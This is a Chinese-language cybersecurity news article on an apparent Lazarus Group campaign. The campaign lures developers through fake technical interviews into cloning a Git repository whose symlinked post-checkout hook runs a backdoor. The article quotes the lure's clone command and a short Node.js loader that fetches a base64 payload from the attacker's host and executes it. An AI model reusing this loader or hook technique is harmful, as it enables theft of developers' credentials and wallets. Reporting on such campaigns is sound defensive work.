本月初,网络安全研究人员发现了一起由 Lazarus Group 发起的新型网络钓鱼活动,该活动通过精心设计的 Git 符号链接漏洞针对开发人员和加密专业人士。
攻击者不再仅仅依赖传统的恶意软件分发渠道,而是利用 Git 处理存储库路径的方式,在符号链接中嵌入恶意钩子,以在常规操作期间触发代码执行。
这种技术可以让攻击者保持低调,同时危害高价值目标,因为这些目标认为他们的开发工作流程不受社会工程学的影响。
最初的诱惑始于专业社交平台上的个性化信息,潜在受害者会被邀请参加模拟技术面试。
对话的目的是获得受害者的信任并诱使他们运行单个 Git 克隆命令。
除此之外,存储库还包含一个名为的嵌套目录,api/db_drivers该目录实际上是指向存储库.git模块目录的符号链接。
这种欺骗性的结构确保一旦 Git 执行签出操作,它就会在不知不觉中执行攻击者的自定义挂钩脚本。
在有报道称私人 GitLab 存储库遭到入侵后, KuCoin 分析师在 8 月底首次发现了这种攻击媒介。
详细分析表明,符号链接漏洞利用 Git 的后检出挂钩机制来启动隐藏的后门。
post-checkout通过在符号链接中嵌入恶意脚本,攻击者无需修改主代码库即可实现代码执行,从而逃避标准完整性检查和静态扫描程序。
随后的取证检查证实,有效载荷与远程命令和控制服务器建立了加密连接,将凭证、系统信息和钱包数据窃取回给威胁行为者。
该漏洞的复杂性在于它与合法工作流程的无缝集成。受害者报告称,执行以下代码后:
git clone --recursive https://guest:glpat-2xxxxxxyx@gitlab.tresalabs.com/product/delivery.git
cd product/delivery恶意钩子会自动触发。嵌入的脚本hooks/post-checkout会调用 Node.js 后门:
const vm = require('vm');
const https = require('https');
https.get('https://gitlab.tresalabs.com:8443/api/v4/project', res => {
let data = '';
res.on('data', chunk => data += chunk);
res.on('end', () => vm.runInNewContext(Buffer.from(JSON.parse(data).payload, 'base64')));
});一旦部署,该后门就会通过清理和替换项目文件来消除明显的篡改迹象,从而保持持久性,确保开发人员只看到预期的代码。
深入探究感染机制
感染分为两个协调阶段:利用 Git 的路径解析和隐秘的钩子执行。
首先,攻击者创建一个目录条目名为的存储库api/db_drivers^M,利用回车处理将路径写入api/db_drivers磁盘,同时在内部保留符号链接目标。
这种差异使 Git 感到困惑,在遍历过程中将路径视为常规目录,但在初始化钩子时将其视为链接。
当 Git 执行默认检出时,它会跟随隐藏的符号链接进入.git/modules/api/db_drivers/hooks/目录并执行post-checkout脚本。
通过利用 Git 的基本行为,Lazarus Group展示了新的技术创造力,将供应链入侵与社会工程学相结合,以针对高价值个人。
此次活动清楚地提醒我们,当工作流程完整性的假设不受质疑时,即使是最值得信赖的开发工具也可能被当作武器。
1. 本版块文章内容及资料部分来源于网络,不代表本站观点,不对其真实性负责,也不构成任何建议。
2. 部分内容由网友自主投稿、编辑整理上传,本站仅提供交流平台,不为该类内容的版权负责。
3. 本版块提供的信息仅作参考,不保证信息的准确性、有效性、及时性和完整性。
4. 若您发现本版块有侵犯您知识产权的内容,请及时与我们联系,我们会尽快修改或删除。
5. 使用者违规、不可抗力(如黑客攻击)或第三方擅自转载引发的争议,联盟不承担责任。
6. 联盟可修订本声明,官网发布即生效,继续使用视为接受新条款。
